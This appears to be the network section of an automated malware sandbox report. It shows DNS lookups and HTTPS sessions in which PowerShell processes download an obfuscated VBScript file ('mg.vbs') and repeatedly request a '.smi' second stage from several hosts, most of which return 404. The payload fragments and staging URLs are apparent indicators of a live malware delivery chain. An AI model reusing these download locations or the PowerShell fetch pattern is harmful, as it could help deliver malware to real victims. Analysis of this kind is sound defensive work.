                                                                            Dec 5, 2024 10:40:14.895231009 CET49720443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:14.895267963 CET44349720184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:15.340529919 CET44349720184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:15.340595007 CET44349720184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:15.340656042 CET49720443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:15.341021061 CET49720443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:19.368469954 CET49721443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:19.368513107 CET44349721148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:19.368638992 CET49721443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:19.368892908 CET49721443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:19.368908882 CET44349721148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:20.768723011 CET44349721148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:20.769900084 CET49721443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:20.769918919 CET44349721148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:21.345829010 CET44349721148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:21.346029997 CET44349721148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:21.346106052 CET49721443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:21.346409082 CET49721443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:25.355618954 CET49722443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:25.355678082 CET44349722184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:25.355752945 CET49722443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:25.356034040 CET49722443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:25.356049061 CET44349722184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:26.617710114 CET44349722184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:26.619066000 CET49722443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:26.619108915 CET44349722184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:27.078748941 CET44349722184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:27.078840017 CET44349722184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:27.078979969 CET49722443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:27.079431057 CET49722443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:31.101977110 CET49723443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:31.102027893 CET44349723148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:31.102123022 CET49723443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:31.102385044 CET49723443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:31.102405071 CET44349723148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:32.500998020 CET44349723148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:32.505276918 CET49723443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:32.505326033 CET44349723148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:33.049293041 CET44349723148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:33.049473047 CET44349723148.251.114.233192.168.2.9
                                                                            Dec 5, 2024 10:40:33.049556017 CET49723443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:33.050442934 CET49723443192.168.2.9148.251.114.233
                                                                            Dec 5, 2024 10:40:37.057224989 CET49724443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:37.057285070 CET44349724184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:37.057401896 CET49724443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:37.057657957 CET49724443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:37.057667971 CET44349724184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:38.321846008 CET44349724184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:38.323329926 CET49724443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:38.323380947 CET44349724184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:38.819200993 CET44349724184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:38.819289923 CET44349724184.171.244.231192.168.2.9
                                                                            Dec 5, 2024 10:40:38.819415092 CET49724443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:38.819957018 CET49724443192.168.2.9184.171.244.231
                                                                            Dec 5, 2024 10:40:42.837376118 CET49725443192.168.2.9148.251.114.233
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 5, 2024 10:39:24.883579969 CET | 51948 | 53 | 192.168.2.9 | 1.1.1.1
Dec 5, 2024 10:39:25.024419069 CET | 53 | 51948 | 1.1.1.1 | 192.168.2.9
Dec 5, 2024 10:39:27.931627989 CET | 52035 | 53 | 192.168.2.9 | 1.1.1.1
Dec 5, 2024 10:39:28.069765091 CET | 53 | 52035 | 1.1.1.1 | 192.168.2.9
Dec 5, 2024 10:39:32.310028076 CET | 60967 | 53 | 192.168.2.9 | 1.1.1.1
Dec 5, 2024 10:39:32.448858976 CET | 53 | 60967 | 1.1.1.1 | 192.168.2.9
Dec 5, 2024 10:39:44.071896076 CET | 60863 | 53 | 192.168.2.9 | 1.1.1.1
Dec 5, 2024 10:39:44.212044954 CET | 53 | 60863 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 5, 2024 10:39:24.883579969 CET | 192.168.2.9 | 1.1.1.1 | 0xcf95 | Standard query (0) | www.fornid.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:39:27.931627989 CET | 192.168.2.9 | 1.1.1.1 | 0x716f | Standard query (0) | www.pineappletech.ae | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:39:32.310028076 CET | 192.168.2.9 | 1.1.1.1 | 0xfeb0 | Standard query (0) | www.almrwad.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:39:44.071896076 CET | 192.168.2.9 | 1.1.1.1 | 0x6db1 | Standard query (0) | www.erp-royal-crown.info | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 5, 2024 10:39:25.024419069 CET | 1.1.1.1 | 192.168.2.9 | 0xcf95 | No error (0) | www.fornid.com | fornid.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 10:39:25.024419069 CET | 1.1.1.1 | 192.168.2.9 | 0xcf95 | No error (0) | fornid.com | - | 93.95.216.175 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:39:28.069765091 CET | 1.1.1.1 | 192.168.2.9 | 0x716f | No error (0) | www.pineappletech.ae | - | 91.193.42.13 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:39:32.448858976 CET | 1.1.1.1 | 192.168.2.9 | 0xfeb0 | No error (0) | www.almrwad.com | almrwad.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 10:39:32.448858976 CET | 1.1.1.1 | 192.168.2.9 | 0xfeb0 | No error (0) | almrwad.com | - | 184.171.244.231 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 10:39:44.212044954 CET | 1.1.1.1 | 192.168.2.9 | 0x6db1 | No error (0) | www.erp-royal-crown.info | erp-royal-crown.info | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 10:39:44.212044954 CET | 1.1.1.1 | 192.168.2.9 | 0x6db1 | No error (0) | erp-royal-crown.info | - | 148.251.114.233 | A (IP address) | IN (0x0001) | false
                                                                            • www.fornid.com
                                                                            • www.pineappletech.ae
                                                                            • www.almrwad.com
                                                                            • www.erp-royal-crown.info
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49709 | 93.95.216.175 | 443 | 7372 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:26 UTC | 116 | OUT | GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
    Host: www.fornid.com
    Connection: Keep-Alive
2024-12-05 09:39:27 UTC | 553 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:39:26 GMT
    Server: Apache
    P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
    Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=rMDVJJyqzbUxb1uFCvyisiM0e%2FK268mtgB%2FbNpOhPhr4fxnTX%2FMSpEfZIoqrX%2BXqP6DO2Fqc%2BBFZkXxuDpMJZKAr8c7Z1ao6vEvWxyuOg1g%3D000074; expires=Wed, 25-Dec-2024 09:39:26 GMT; Max-Age=1727999; path=/; domain=www.fornid.com; httponly
    Upgrade: h2,h2c
    Connection: Upgrade, close
    Vary: Accept-Encoding
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=utf-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49710 | 91.193.42.13 | 443 | 7372 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:29 UTC | 79 | OUT | GET /na/mg.vbs HTTP/1.1
    Host: www.pineappletech.ae
    Connection: Keep-Alive
2024-12-05 09:39:29 UTC | 232 | IN | HTTP/1.1 200 OK
    Connection: close
    content-type: text/vbscript
    last-modified: Thu, 27 Jun 2024 13:15:58 GMT
    accept-ranges: bytes
    content-length: 29287
    date: Thu, 05 Dec 2024 09:39:29 GMT
    server: LiteSpeed
    vary: User-Agent
2024-12-05 09:39:29 UTC | 1136 | IN | Data (ASCII): Function Seasoning(Ambrain)Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)Seasoning = ChrW(Ambrain)Opskreknivsplid = Command End Function elektroingenirerne = LenB("Sardinieren") elektroingenirerne = elektroingenirer
2024-12-05 09:39:29 UTC | 14994 | IN | Data (ASCII): Const Tapeti = "Deniable datastyr uncelibate"Private Const Noaordets = -4508Private Const Ostemad = &H7502Private Const Botryomyces141 = &HFFFFE888Private Const Ufordrageligste = &H5A65Private Const Reverso = &HE948Private Const Saats = "Decim
2024-12-05 09:39:30 UTC | 13157 | IN | Data (ASCII): edness"Private Const Skakspillerens = 17488Private Const Glinsende = -42454Private Const Evasiveness = &H48CEPrivate Const Leptorrhinism155 = -18918Private Const Programkomplekset = "Congresses molimen ngsteligeres"Private Const Cigarkasse = 5


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49711 | 184.171.244.231 | 443 | 8008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:33 UTC | 183 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:39:34 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:39:34 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:39:34 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49712 | 184.171.244.231 | 443 | 8008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:39 UTC | 65 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.almrwad.com
2024-12-05 09:39:40 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:39:39 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:39:40 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49713 | 148.251.114.233 | 443 | 8008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:45 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:39:46 UTC | 238 | IN | HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:39:45 GMT
    server: LiteSpeed
2024-12-05 09:39:46 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:39:46 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49714 | 184.171.244.231 | 443 | 8008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:51 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:39:51 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:39:51 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:39:51 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 49716 | 148.251.114.233 | 443 | 8008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:39:57 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:39:57 UTC | 238 | IN | HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:39:57 GMT
    server: LiteSpeed
2024-12-05 09:39:57 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:39:57 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.9 | 49717 | 184.171.244.231 | 443 | 8008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:03 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:40:03 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:40:03 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
2024-12-05 09:40:03 UTC | 315 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 49719 | 148.251.114.233 | 443 | 8008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:08 UTC | 98 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.erp-royal-crown.info
    Connection: Keep-Alive
2024-12-05 09:40:09 UTC | 238 | IN | HTTP/1.1 404 Not Found
    Connection: close
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 05 Dec 2024 09:40:09 GMT
    server: LiteSpeed
2024-12-05 09:40:09 UTC | 1130 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-12-05 09:40:09 UTC | 121 | IN | Data Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 49720 | 184.171.244.231 | 443 | 8008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 09:40:14 UTC | 89 | OUT | GET /wh/Subordinerendes78.smi HTTP/1.1
    Host: www.almrwad.com
    Connection: Keep-Alive
2024-12-05 09:40:15 UTC | 164 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 05 Dec 2024 09:40:15 GMT
    Server: Apache
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
